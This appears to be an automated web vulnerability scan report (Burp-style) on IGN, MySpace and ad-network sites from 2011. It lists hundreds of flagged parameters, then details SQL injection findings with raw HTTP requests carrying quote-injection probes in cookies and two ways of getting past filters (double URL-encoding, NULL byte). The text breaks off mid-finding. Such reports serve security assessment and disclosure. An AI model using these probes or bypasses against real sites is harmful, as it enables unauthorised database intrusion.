3.647. http://www.ign.com/videos/2011/01/31/killzone-in-5-minutes [name of an arbitrarily supplied request parameter]

3.648. http://www.ign.com/videos/2011/01/31/killzone-in-5-minutes [name of an arbitrarily supplied request parameter]

3.649. http://www.ign.com/videos/2011/01/31/killzone-in-5-minutes [objectid parameter]

3.650. http://www.ign.com/videos/2011/01/31/killzone-in-5-minutes [objectid parameter]

3.651. http://www.ign.com/videos/2011/02/03/killzone-3-video-review [REST URL parameter 5]

3.652. http://www.ign.com/videos/2011/02/03/killzone-3-video-review [name of an arbitrarily supplied request parameter]

3.653. http://www.ign.com/videos/2011/02/03/killzone-3-video-review [name of an arbitrarily supplied request parameter]

3.654. http://www.ign.com/videos/2011/02/03/killzone-3-video-review [objectid parameter]

3.655. http://www.ign.com/videos/2011/02/03/killzone-3-video-review [objectid parameter]

3.656. http://www.ign.com/videos/2011/02/04/confession-series-trailer [REST URL parameter 5]

3.657. http://www.ign.com/videos/2011/02/04/confession-series-trailer [name of an arbitrarily supplied request parameter]

3.658. http://www.ign.com/videos/2011/02/04/confession-series-trailer [name of an arbitrarily supplied request parameter]

3.659. http://www.ign.com/videos/2011/02/04/ign-daily-fix-020411 [REST URL parameter 2]

3.660. http://www.ign.com/videos/2011/02/04/ign-daily-fix-020411 [REST URL parameter 3]

3.661. http://www.ign.com/videos/2011/02/04/ign-daily-fix-020411 [REST URL parameter 4]

3.662. http://www.ign.com/videos/2011/02/04/ign-daily-fix-020411 [REST URL parameter 5]

3.663. http://www.ign.com/videos/2011/02/04/ign-daily-fix-020411 [name of an arbitrarily supplied request parameter]

3.664. http://www.ign.com/videos/2011/02/04/ign-daily-fix-020411 [name of an arbitrarily supplied request parameter]

3.665. http://www.ign.com/videos/2011/02/04/ign-weekly-wood-020411 [REST URL parameter 2]

3.666. http://www.ign.com/videos/2011/02/04/ign-weekly-wood-020411 [REST URL parameter 3]

3.667. http://www.ign.com/videos/2011/02/04/ign-weekly-wood-020411 [REST URL parameter 4]

3.668. http://www.ign.com/videos/2011/02/04/ign-weekly-wood-020411 [REST URL parameter 5]

3.669. http://www.ign.com/videos/2011/02/04/ign-weekly-wood-020411 [name of an arbitrarily supplied request parameter]

3.670. http://www.ign.com/videos/2011/02/04/ign-weekly-wood-020411 [name of an arbitrarily supplied request parameter]

3.671. http://www.ign.com/videos/2011/02/04/madden-nfl-11-super-bowl-simulation [REST URL parameter 5]

3.672. http://www.ign.com/videos/2011/02/04/madden-nfl-11-super-bowl-simulation [name of an arbitrarily supplied request parameter]

3.673. http://www.ign.com/videos/2011/02/04/madden-nfl-11-super-bowl-simulation [name of an arbitrarily supplied request parameter]

3.674. http://www.shmoop.com/news/2010/09/21/famous-quotes-translated-lolcat/ [REST URL parameter 5]

3.675. http://www.shmoop.com/news/wp-includes/js/jquery/jquery.js [REST URL parameter 2]

3.676. http://www.shmoop.com/news/wp-includes/js/jquery/jquery.js [REST URL parameter 3]

3.677. http://www.shmoop.com/news/wp-includes/js/jquery/jquery.js [REST URL parameter 4]

3.678. http://www.shmoop.com/news/wp-includes/js/jquery/jquery.js [REST URL parameter 5]

3.679. http://www.thunderguy.com/semicolon/. [REST URL parameter 1]

3.680. http://www2.glam.com/app/site/affiliate/viewChannelModule.act [adSize parameter]

3.681. http://www2.glam.com/app/site/affiliate/viewChannelModule.act [zone parameter]

3.682. http://www35.glam.com/gad/glamadapt_jsrv.act [;flg parameter]

3.683. http://www35.glam.com/gad/glamadapt_jsrv.act [ga_adsrv parameter]

3.684. http://www35.glam.com/gad/glamadapt_jsrv.act [ga_adsrv parameter]

3.685. http://www35.glam.com/gad/glamadapt_jsrv.act [name of an arbitrarily supplied request parameter]

3.686. http://www35.glam.com/gad/glamadapt_jsrv.act [name of an arbitrarily supplied request parameter]

3.687. http://xbox360.ign.com/ [name of an arbitrarily supplied request parameter]

3.688. http://xbox360.ign.com/ [name of an arbitrarily supplied request parameter]

3.689. http://xbox360.ign.com/articles/114/1140235p1.html [name of an arbitrarily supplied request parameter]

3.690. http://xbox360.ign.com/articles/114/1140235p1.html [name of an arbitrarily supplied request parameter]

3.691. http://xbox360.ign.com/articles/114/1140284p1.html [name of an arbitrarily supplied request parameter]

3.692. http://xbox360.ign.com/articles/114/1140284p1.html [name of an arbitrarily supplied request parameter]

3.693. http://xbox360.ign.com/articles/114/1140518p1.html [name of an arbitrarily supplied request parameter]

3.694. http://xbox360.ign.com/articles/114/1140518p1.html [name of an arbitrarily supplied request parameter]

3.695. http://xbox360.ign.com/articles/114/1146752p1.html [name of an arbitrarily supplied request parameter]

3.696. http://xbox360.ign.com/articles/114/1146752p1.html [name of an arbitrarily supplied request parameter]

3.697. http://xbox360.ign.com/articles/114/1147539p1.html [name of an arbitrarily supplied request parameter]

3.698. http://xbox360.ign.com/articles/114/1147539p1.html [name of an arbitrarily supplied request parameter]

3.699. http://xbox360.ign.com/articles/114/1147619p1.html [name of an arbitrarily supplied request parameter]

3.700. http://xbox360.ign.com/articles/114/1147619p1.html [name of an arbitrarily supplied request parameter]

3.701. http://xbox360.ign.com/articles/114/1147697p1.html [name of an arbitrarily supplied request parameter]

3.702. http://xbox360.ign.com/articles/114/1147697p1.html [name of an arbitrarily supplied request parameter]

3.703. http://xbox360.ign.com/articles/114/1147733p1.html [name of an arbitrarily supplied request parameter]

3.704. http://xbox360.ign.com/articles/114/1147733p1.html [name of an arbitrarily supplied request parameter]

3.705. http://xbox360.ign.com/articles/114/1147803p1.html [name of an arbitrarily supplied request parameter]

3.706. http://xbox360.ign.com/articles/114/1147803p1.html [name of an arbitrarily supplied request parameter]

3.707. http://xbox360.ign.com/articles/114/1147942p1.html [name of an arbitrarily supplied request parameter]

3.708. http://xbox360.ign.com/articles/114/1147942p1.html [name of an arbitrarily supplied request parameter]

3.709. http://xbox360.ign.com/articles/114/1148006p1.html [name of an arbitrarily supplied request parameter]

3.710. http://xbox360.ign.com/articles/114/1148006p1.html [name of an arbitrarily supplied request parameter]

3.711. http://xbox360.ign.com/articles/114/1148025c.html [name of an arbitrarily supplied request parameter]

3.712. http://xbox360.ign.com/articles/114/1148025c.html [name of an arbitrarily supplied request parameter]

3.713. http://xbox360.ign.com/articles/114/1148025p1.html [name of an arbitrarily supplied request parameter]

3.714. http://xbox360.ign.com/articles/114/1148025p1.html [name of an arbitrarily supplied request parameter]

3.715. http://xbox360.ign.com/articles/114/1148045c.html [name of an arbitrarily supplied request parameter]

3.716. http://xbox360.ign.com/articles/114/1148045c.html [name of an arbitrarily supplied request parameter]

3.717. http://xbox360.ign.com/articles/114/1148045p1.html [name of an arbitrarily supplied request parameter]

3.718. http://xbox360.ign.com/articles/114/1148045p1.html [name of an arbitrarily supplied request parameter]

3.719. http://xbox360.ign.com/articles/114/1148058c.html [name of an arbitrarily supplied request parameter]

3.720. http://xbox360.ign.com/articles/114/1148058c.html [name of an arbitrarily supplied request parameter]

3.721. http://xbox360.ign.com/articles/114/1148058p1.html [name of an arbitrarily supplied request parameter]

3.722. http://xbox360.ign.com/articles/114/1148058p1.html [name of an arbitrarily supplied request parameter]

3.723. http://xbox360.ign.com/index/features.html [name of an arbitrarily supplied request parameter]

3.724. http://xbox360.ign.com/index/features.html [name of an arbitrarily supplied request parameter]

3.725. http://xbox360.ign.com/index/games.html [name of an arbitrarily supplied request parameter]

3.726. http://xbox360.ign.com/index/games.html [name of an arbitrarily supplied request parameter]

3.727. http://xbox360.ign.com/index/images.html [name of an arbitrarily supplied request parameter]

3.728. http://xbox360.ign.com/index/images.html [name of an arbitrarily supplied request parameter]

3.729. http://xbox360.ign.com/index/latest-updates.html [name of an arbitrarily supplied request parameter]

3.730. http://xbox360.ign.com/index/latest-updates.html [name of an arbitrarily supplied request parameter]

3.731. http://xbox360.ign.com/index/latest-updates.html [types parameter]

3.732. http://xbox360.ign.com/index/latest-updates.html [types parameter]

3.733. http://xbox360.ign.com/index/latest-updates.html [types parameter]

3.734. http://xbox360.ign.com/index/news.html [name of an arbitrarily supplied request parameter]

3.735. http://xbox360.ign.com/index/news.html [name of an arbitrarily supplied request parameter]

3.736. http://xbox360.ign.com/index/previews.html [name of an arbitrarily supplied request parameter]

3.737. http://xbox360.ign.com/index/previews.html [name of an arbitrarily supplied request parameter]

3.738. http://xbox360.ign.com/index/reviews.html [name of an arbitrarily supplied request parameter]

3.739. http://xbox360.ign.com/index/reviews.html [name of an arbitrarily supplied request parameter]

3.740. http://xbox360.ign.com/index/upcoming.html [name of an arbitrarily supplied request parameter]

3.741. http://xbox360.ign.com/index/upcoming.html [name of an arbitrarily supplied request parameter]

3.742. http://xbox360.ign.com/index/videos.html [name of an arbitrarily supplied request parameter]

3.743. http://xbox360.ign.com/index/videos.html [name of an arbitrarily supplied request parameter]

3.744. http://xbox360.ign.com/objects/055/055051.html [name of an arbitrarily supplied request parameter]

3.745. http://xbox360.ign.com/objects/055/055051.html [name of an arbitrarily supplied request parameter]

3.746. http://xbox360.ign.com/objects/064/064330.html [name of an arbitrarily supplied request parameter]

3.747. http://xbox360.ign.com/objects/064/064330.html [name of an arbitrarily supplied request parameter]

3.748. http://xbox360.ign.com/objects/070/070921.html [name of an arbitrarily supplied request parameter]

3.749. http://xbox360.ign.com/objects/070/070921.html [name of an arbitrarily supplied request parameter]

3.750. http://xbox360.ign.com/objects/077/077644.html [name of an arbitrarily supplied request parameter]

3.751. http://xbox360.ign.com/objects/077/077644.html [name of an arbitrarily supplied request parameter]

3.752. http://xbox360.ign.com/objects/077/077723.html [name of an arbitrarily supplied request parameter]

3.753. http://xbox360.ign.com/objects/077/077723.html [name of an arbitrarily supplied request parameter]

3.754. http://xbox360.ign.com/objects/080/080342.html [name of an arbitrarily supplied request parameter]

3.755. http://xbox360.ign.com/objects/080/080342.html [name of an arbitrarily supplied request parameter]

3.756. http://xbox360.ign.com/objects/142/14221217.html [name of an arbitrarily supplied request parameter]

3.757. http://xbox360.ign.com/objects/142/14221217.html [name of an arbitrarily supplied request parameter]

3.758. http://xbox360.ign.com/objects/142/14235014.html [name of an arbitrarily supplied request parameter]

3.759. http://xbox360.ign.com/objects/142/14235014.html [name of an arbitrarily supplied request parameter]

3.760. http://xbox360.ign.com/objects/142/14293266.html [name of an arbitrarily supplied request parameter]

3.761. http://xbox360.ign.com/objects/142/14293266.html [name of an arbitrarily supplied request parameter]

3.762. http://xbox360.ign.com/objects/143/14304771.html [name of an arbitrarily supplied request parameter]

3.763. http://xbox360.ign.com/objects/143/14304771.html [name of an arbitrarily supplied request parameter]

3.764. http://xboxlive.ign.com/ [name of an arbitrarily supplied request parameter]

3.765. http://xboxlive.ign.com/ [name of an arbitrarily supplied request parameter]

3.766. http://xboxlive.ign.com/articles/113/1134848p1.html [name of an arbitrarily supplied request parameter]

3.767. http://xboxlive.ign.com/articles/113/1134848p1.html [name of an arbitrarily supplied request parameter]

3.768. http://xboxlive.ign.com/index/games.html [name of an arbitrarily supplied request parameter]

3.769. http://xboxlive.ign.com/index/games.html [name of an arbitrarily supplied request parameter]

3.770. http://xboxlive.ign.com/index/latest-updates.html [name of an arbitrarily supplied request parameter]

3.771. http://xboxlive.ign.com/index/latest-updates.html [name of an arbitrarily supplied request parameter]

3.772. http://api.myspace.com/-/opensearch/extensions/1.0/ [Referer HTTP header]

3.773. http://support.igninsider.com/ics/support/default.asp [Referer HTTP header]

3.774. http://wrapper.giga.de/a [Referer HTTP header]

3.775. http://wrapper.ign.com/a [Referer HTTP header]

3.776. http://myspace.com/ [name of an arbitrarily supplied request parameter]

3.777. http://optimized-by.rubiconproject.com/a/8276/13378/25879-2.js [ruid cookie]

3.778. http://s50.sitemeter.com/js/counter.js [IP cookie]

3.779. http://searchservice.myspace.com/index.cfm [d parameter]

3.780. http://searchservice.myspace.com/index.cfm [fuseaction parameter]

3.781. http://searchservice.myspace.com/index.cfm [g parameter]

3.782. http://searchservice.myspace.com/index.cfm [loc parameter]

3.783. http://searchservice.myspace.com/index.cfm [maxAge parameter]

3.784. http://searchservice.myspace.com/index.cfm [minAge parameter]

3.785. http://searchservice.myspace.com/index.cfm [name of an arbitrarily supplied request parameter]

3.786. http://searchservice.myspace.com/index.cfm [npic parameter]

3.787. http://searchservice.myspace.com/index.cfm [pg parameter]

3.788. http://searchservice.myspace.com/index.cfm [qry parameter]

3.789. http://searchservice.myspace.com/index.cfm [type parameter]

3.790. http://tag.admeld.com/ad/iframe/177/ignus/300x250/ign_front [meld_sess cookie]

3.791. http://tag.admeld.com/ad/iframe/185/thechive_sites/160x600/thechive_us [meld_sess cookie]

3.792. http://tag.admeld.com/ad/iframe/185/thechive_sites/160x600/thechive_us [meld_sess cookie]

3.793. http://tag.admeld.com/ad/iframe/185/thechive_sites/300x250/thechive_us [meld_sess cookie]

3.794. http://tag.admeld.com/ad/iframe/185/thechive_sites/300x250/thechive_us [meld_sess cookie]

3.795. http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us [meld_sess cookie]

3.796. http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us [meld_sess cookie]

3.797. http://tag.admeld.com/ad/json/100/glamtoptier/160x600/420105803 [meld_sess cookie]

3.798. http://tag.admeld.com/ad/json/100/glamtoptier/300x250/420105803 [meld_sess cookie]

3.799. http://tag.admeld.com/ad/json/100/glamtoptier/728x90/420105803 [meld_sess cookie]

3.800. http://www2.glam.com/app/site/affiliate/viewChannelModule.act [glam_bt cookie]

3.801. http://www2.glam.com/app/site/affiliate/viewChannelModule.act [glam_sid cookie]

3.802. http://www2.glam.com/app/site/affiliate/viewChannelModule.act [qcsegs cookie]

3.803. http://www35.glam.com/gad/glamadapt_jsrv.act [glam_sid cookie]



1. SQL injection  next
There are 56 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://cheats.ign.com/index/xbox-360-cheats/index.html [i18n-cc cookie]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://cheats.ign.com
Path:   /index/xbox-360-cheats/index.html

Issue detail

The i18n-cc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the i18n-cc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the i18n-cc cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /index/xbox-360-cheats/index.html HTTP/1.1
Host: cheats.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US%2527; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;

Response 1

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:46:19 GMT
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1297043179958v-2n-12mc+1297043179958mv+2mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 161198

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co
...[SNIP]...
<SCRIPT LANGUAGE=VBScript\> \n');
document.write('on error resume next \n');
document.write('ShockMode = (IsObject(CreateObject("ShockwaveFlash.ShockwaveFlash.10")))\n');
document.write('<\/SCRIPT\>
...[SNIP]...

Request 2

GET /index/xbox-360-cheats/index.html HTTP/1.1
Host: cheats.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US%2527%2527; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;

Response 2

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:46:20 GMT
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1297043180761v-2n-12mc+1297043180761mv+2mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 156025

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co
...[SNIP]...

1.2. http://cheats.ign.com/ob2/068/077/077723.html [optimizelyBuckets cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://cheats.ign.com
Path:   /ob2/068/077/077723.html

Issue detail

The optimizelyBuckets cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the optimizelyBuckets cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /ob2/068/077/077723.html HTTP/1.1
Host: cheats.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D'; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;

Response 1

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:46:55 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c05-26779-1963434885-2;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:46:55 GMT
Set-Cookie: freq=c-1297043215180v-2n-12mc+1297043215180mv+2mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 109881

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...
<a href="http://www.eyewonderlabs.com/ct.cfm?ewbust=0&guid=0&ewadid=122610&eid=1420211&file=http://cdn.eyewonder.com/100125/765638/1420211/NOSCRIPTfailover.gif&pnl=MainBanner&type=0&name=Clickthru-NOSCRIPT&num=1&time=0&diff=0&clkX=&clkY=&click=http://www.facebook.com/marvelvscapcom3?v=app_163719520308859" target="_blank">
...[SNIP]...

Request 2

GET /ob2/068/077/077723.html HTTP/1.1
Host: cheats.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D''; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;

Response 2

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:46:55 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1297043216021v-2n-12mc+1297043216021mv+2mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 114150

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...

1.3. http://cheats.ign.com/ob2/068/142/14235018.html [_br_uid_1 cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://cheats.ign.com
Path:   /ob2/068/142/14235018.html

Issue detail

The _br_uid_1 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the _br_uid_1 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /ob2/068/142/14235018.html HTTP/1.1
Host: cheats.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
